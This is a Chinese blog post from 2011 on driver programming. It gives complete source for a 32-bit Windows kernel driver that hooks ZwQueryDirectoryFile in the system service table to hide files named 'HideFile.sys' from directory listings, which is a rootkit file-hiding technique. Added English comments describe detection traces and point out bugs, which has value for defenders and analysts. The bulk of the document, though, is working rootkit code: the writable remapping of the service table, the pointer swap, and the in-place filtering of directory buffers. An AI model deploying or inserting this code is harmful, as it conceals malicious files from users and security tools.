hook ZwQueryDirectoryFile实现文件隐藏  

2011-06-10 16:54:39|  分类: 驱动编程 |  标签: |举报 |字号 订阅

隐藏文件, 主要是SSDT HOOK ZwQueryDirectoryFile函数.

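#include <ntddk.h>

// Local aliases. ULONG (and BOOLEAN) already come from ntddk.h, so some of
// these are identical redefinitions that the Microsoft compiler tolerates.
typedef BOOLEAN BOOL;
typedef unsigned long DWORD;
typedef DWORD * PDWORD;
typedef unsigned long ULONG;
typedef unsigned short WORD;
typedef unsigned char BYTE;

// Layout of a KeServiceDescriptorTable entry on the 32-bit x86 kernel.
// ServiceTableBase is the array of system-service function pointers that
// Hook() remaps and overwrites; NumberOfServices is its entry count.
#pragma pack(1)
typedef struct ServiceDescriptorEntry {
    unsigned int *ServiceTableBase;
    unsigned int *ServiceCounterTableBase;
    unsigned int NumberOfServices;
    unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()

// Exported by the x86 ntoskrnl but not declared in ntddk.h, hence the manual
// import. The x64 kernel does not export it.
__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

// Record layout returned for the FileBothDirectoryInformation class.
// Entries are chained by NextEntryOffset (0 marks the last one). FileName is
// FileNameLength bytes of WCHAR and, per the NT API, is not NUL-terminated.
typedef struct _FILE_BOTH_DIR_INFORMATION {
    ULONG           NextEntryOffset;
    ULONG           FileIndex;
    LARGE_INTEGER   CreationTime;
    LARGE_INTEGER   LastAccessTime;
    LARGE_INTEGER   LastWriteTime;
    LARGE_INTEGER   ChangeTime;
    LARGE_INTEGER   EndOfFile;
    LARGE_INTEGER   AllocationSize;
    ULONG           FileAttributes;
    ULONG           FileNameLength;
    ULONG           EaSize;
    CCHAR           ShortNameLength;
    WCHAR           ShortName[12];
    WCHAR           FileName[1];
} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;


// Our System Call Table
// Second, writable virtual mapping of ServiceTableBase obtained via the MDL
// in Hook(); HOOK()/UNHOOK() write through this alias, not the original page.
PVOID* NewSystemCallTable;

// Our Memory Descriptor List
// Describes the service table pages; created in Hook(), released in UnHook().
PMDL pMyMDL;

// Reads the 32-bit immediate at byte offset 1 of a Zw* stub, i.e. the operand
// of the "mov eax, <service index>" that opens every x86 ntoskrnl stub.
// Valid only for that 32-bit stub layout; nothing checks the opcode byte.
#define HOOK_INDEX(function2hook) *(PULONG)((PUCHAR)function2hook+1)

// Atomically replace the SSDT slot for functionName with newPointer2Function,
// storing the previous value so the hook can pass calls through and UNHOOK
// can restore it.
#define HOOK(functionName, newPointer2Function, oldPointer2Function )  \
       oldPointer2Function = (PVOID) InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) newPointer2Function)

// Atomically write the saved original pointer back into the SSDT slot.
#define UNHOOK(functionName, oldPointer2Function)  \
       InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) oldPointer2Function)

// Prototype of the service being hooked. It lives in ntifs.h rather than
// ntddk.h, so it is repeated here for the HOOK_INDEX() address lookup.
NTSYSAPI
NTSTATUS
NTAPI ZwQueryDirectoryFile(
                          IN  HANDLE FileHandle,
                          IN  HANDLE Event OPTIONAL,
                          IN  PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                          IN  PVOID ApcContext OPTIONAL,
                          OUT PIO_STATUS_BLOCK IoStatusBlock,
                          OUT PVOID FileInformation,
                          IN  ULONG Length,
                          IN  FILE_INFORMATION_CLASS FileInformationClass,
                          IN  BOOLEAN ReturnSingleEntry,
                          IN  PUNICODE_STRING FileName OPTIONAL,
                          IN  BOOLEAN RestartScan
                          );

// Function-pointer type with ZwQueryDirectoryFile's signature, used to call
// the saved original entry.
typedef NTSTATUS (*ZWQUERYDIRECTORYFILE)(
                              IN  HANDLE FileHandle,
                              IN  HANDLE Event OPTIONAL,
                              IN  PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                              IN  PVOID ApcContext OPTIONAL,
                              OUT PIO_STATUS_BLOCK IoStatusBlock,
                              OUT PVOID FileInformation,
                              IN  ULONG Length,
                              IN  FILE_INFORMATION_CLASS FileInformationClass,
                              IN  BOOLEAN ReturnSingleEntry,
                              IN  PUNICODE_STRING FileName OPTIONAL,
                              IN  BOOLEAN RestartScan
                              );

// Original SSDT entry saved by HOOK(); every hooked call is forwarded to it.
ZWQUERYDIRECTORYFILE        OldZwQueryDirectoryFile;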

NTSTATUS NewZwQueryDirectoryFile(
  IN  HANDLE FileHandle,
  IN  HANDLE Event OPTIONAL,
  IN  PIO_APC_ROUTINE ApcRoutine OPTIONAL,
  IN  PVOID ApcContext OPTIONAL,
  OUT PIO_STATUS_BLOCK IoStatusBlock,
  OUT PVOID FileInformation,
  IN  ULONG Length,
  IN  FILE_INFORMATION_CLASS FileInformationClass,
  IN  BOOLEAN ReturnSingleEntry,
  IN  PUNICODE_STRING FileName OPTIONAL,
  IN  BOOLEAN RestartScan
  )
{
    // Replacement installed in the ZwQueryDirectoryFile SSDT slot. It forwards
    // the call to the saved original and then, only for results of class
    // FileBothDirectoryInformation, rewrites the caller's buffer in place so
    // that entries whose name begins with "HideFile.sys" are unlinked.
    // Parameters and return value are those of ZwQueryDirectoryFile; the
    // original call's status is returned unchanged.
    //
    // Defender notes: this is the textbook SSDT directory-listing filter. It
    // leaves traces -- the SSDT slot targets an address outside ntoskrnl,
    // KdPrint output on every call, and IoStatusBlock is never adjusted after
    // entries are removed. Other information classes and raw volume reads are
    // not filtered, so the file remains visible through them.
    NTSTATUS status;
    ANSI_STRING ansiFileName,ansiDirName,HideDirFile;
    UNICODE_STRING uniFileName;
    
    // Name to suppress. Only HideDirFile.Length bytes are compared below, so
    // this behaves as a prefix match, not an exact one.
    RtlInitAnsiString(&HideDirFile,"HideFile.sys"); 
    KdPrint(("NewZwQueryDirectoryFile called."));
    
    // Pass-through to the original service; all filtering acts on its output.
    status = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) (
        FileHandle,
        Event,
        ApcRoutine,
        ApcContext,
        IoStatusBlock,
        FileInformation,
        Length,
        FileInformationClass,
        ReturnSingleEntry,
        FileName,
        RestartScan);

    // This part is the core of the file hiding.
    if( NT_SUCCESS(status) && FileInformationClass == FileBothDirectoryInformation )
    {
        PFILE_BOTH_DIR_INFORMATION pFileInfo;       // entry under examination
        PFILE_BOTH_DIR_INFORMATION pLastFileInfo;   // previous kept entry, used to terminate the chain
        BOOLEAN bLastOne;

        pFileInfo = (PFILE_BOTH_DIR_INFORMATION)FileInformation; 
        pLastFileInfo = NULL;

        do
        {
            bLastOne = !( pFileInfo->NextEntryOffset );   // NextEntryOffset == 0 marks the final entry
            // NOTE(review): FileName is counted by FileNameLength rather than
            // NUL-terminated, yet RtlInitUnicodeString scans for a terminator,
            // so the converted string can extend past this entry. Both
            // conversions allocate (TRUE) on every iteration but are freed only
            // once after the loop, so each extra iteration leaks pool memory.
            RtlInitUnicodeString(&uniFileName, pFileInfo->FileName);
            RtlUnicodeStringToAnsiString(&ansiFileName, &uniFileName, TRUE);
            RtlUnicodeStringToAnsiString(&ansiDirName, &uniFileName, TRUE);   // ansiDirName is never read
            
            KdPrint(("Hide File: %Z\n", &ansiFileName));   // logged for every entry, hidden or not

            // Compare the first HideDirFile.Length bytes of the name, regardless
            // of ansiFileName's own length.
            if( RtlCompareMemory(ansiFileName.Buffer, HideDirFile.Buffer, HideDirFile.Length ) == HideDirFile.Length)
            {
                if(bLastOne) 
                {
                    // Matching entry is the last one: cut the chain at the
                    // previous entry. pLastFileInfo is still NULL when the
                    // match is also the first entry.
                    pLastFileInfo->NextEntryOffset = 0;
                    break;
                } 
                else // move the pointer forward
                {
                    // Overwrite this entry with everything after it. The
                    // following entries' NextEntryOffset values are relative,
                    // so the chain stays intact. iLeft is derived from Length
                    // (the caller's buffer size), not from the bytes actually
                    // returned by the original call.
                    int iPos = ((ULONG)pFileInfo) - (ULONG)FileInformation;
                    int iLeft = (DWORD)Length - iPos - pFileInfo->NextEntryOffset;
                    RtlCopyMemory( (PVOID)pFileInfo, (PVOID)( (char *)pFileInfo + pFileInfo->NextEntryOffset ), (DWORD)iLeft );
                    continue;   // re-examine the entry that now occupies this slot
                }
            }

            pLastFileInfo = pFileInfo;
            pFileInfo = (PFILE_BOTH_DIR_INFORMATION)((char *)pFileInfo + pFileInfo->NextEntryOffset);

        }while(!bLastOne);

        // Releases only the most recent pair of conversions (see leak note above).
        RtlFreeAnsiString(&ansiDirName); 
        RtlFreeAnsiString(&ansiFileName);
    }
    
    return status;
}

NTSTATUS Hook( )
{
    // Installs the SSDT hook. The service table's own page is write-protected,
    // so the table is described by an MDL and mapped a second time with
    // MmMapLockedPages; that alias (NewSystemCallTable) is what HOOK() writes.
    // Returns STATUS_SUCCESS, or STATUS_UNSUCCESSFUL when the MDL cannot be
    // created or mapped.
    //
    // Defender notes: the sequence is x86-only -- 4-byte table slots,
    // HOOK_INDEX()'s stub decoding and the KeServiceDescriptorTable export all
    // assume the 32-bit kernel; on x64 the table is not exported and Kernel
    // Patch Protection bug-checks on SSDT writes. A hooked table is found by
    // walking ServiceTableBase and flagging slots that point outside the
    // ntoskrnl image. MmCreateMdl is documented as obsolete (IoAllocateMdl is
    // the supported replacement).
    pMyMDL = MmCreateMdl(  NULL,
        KeServiceDescriptorTable.ServiceTableBase,
        KeServiceDescriptorTable.NumberOfServices * 4 );   // 4 == size of one 32-bit table slot
    
    if( !pMyMDL )
        return( STATUS_UNSUCCESSFUL );
    
    MmBuildMdlForNonPagedPool( pMyMDL );
    // NOTE(review): the flag is set by hand before mapping, presumably so the
    // new mapping is writable; this is outside the documented MDL contract.
    pMyMDL->MdlFlags = pMyMDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
    NewSystemCallTable = MmMapLockedPages( pMyMDL, KernelMode );
    
    if( !NewSystemCallTable )
        return( STATUS_UNSUCCESSFUL );   // pMyMDL is not freed on this path
    
    // The decoded index is not checked against NumberOfServices before use.
    HOOK( ZwQueryDirectoryFile,NewZwQueryDirectoryFile ,OldZwQueryDirectoryFile);
    
    return( STATUS_SUCCESS );
}

NTSTATUS UnHook( )
{
    // Reverses Hook(): writes the saved original pointer back into the SSDT
    // slot, then tears down the MDL mapping. A no-op when Hook() never mapped
    // the table (NewSystemCallTable still NULL). Always returns STATUS_SUCCESS.
    //
    // Nothing waits for calls still executing inside NewZwQueryDirectoryFile,
    // so a thread inside the hook while the driver image is unmapped could
    // fault. The globals are not reset afterwards, so a second call would
    // unmap and free the same MDL again.
    if( NewSystemCallTable )
    {
        UNHOOK( ZwQueryDirectoryFile, OldZwQueryDirectoryFile );   // atomic swap back
        MmUnmapLockedPages( NewSystemCallTable, pMyMDL );
        IoFreeMdl( pMyMDL );
    }
    return( STATUS_SUCCESS );
}

NTSTATUS OnUnload( IN PDRIVER_OBJECT DriverObject )
{
    // DriverUnload callback: put the original SSDT entry back before the
    // driver image disappears. DriverObject is unused; the result of UnHook()
    // is passed straight through.
    KdPrint(("OnUnload called\n"));
    return UnHook();
}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,
                     IN PUNICODE_STRING theRegistryPath)
{
    // Driver entry point: register the unload routine, then install the SSDT
    // hook. Hook()'s return value is not examined, so the driver reports
    // success and stays loaded even when the hook was not installed.
    // theRegistryPath is unused.
    KdPrint(("Enter DriverEntry!"));

    theDriverObject->DriverUnload = OnUnload;
    Hook();

    return STATUS_SUCCESS;
}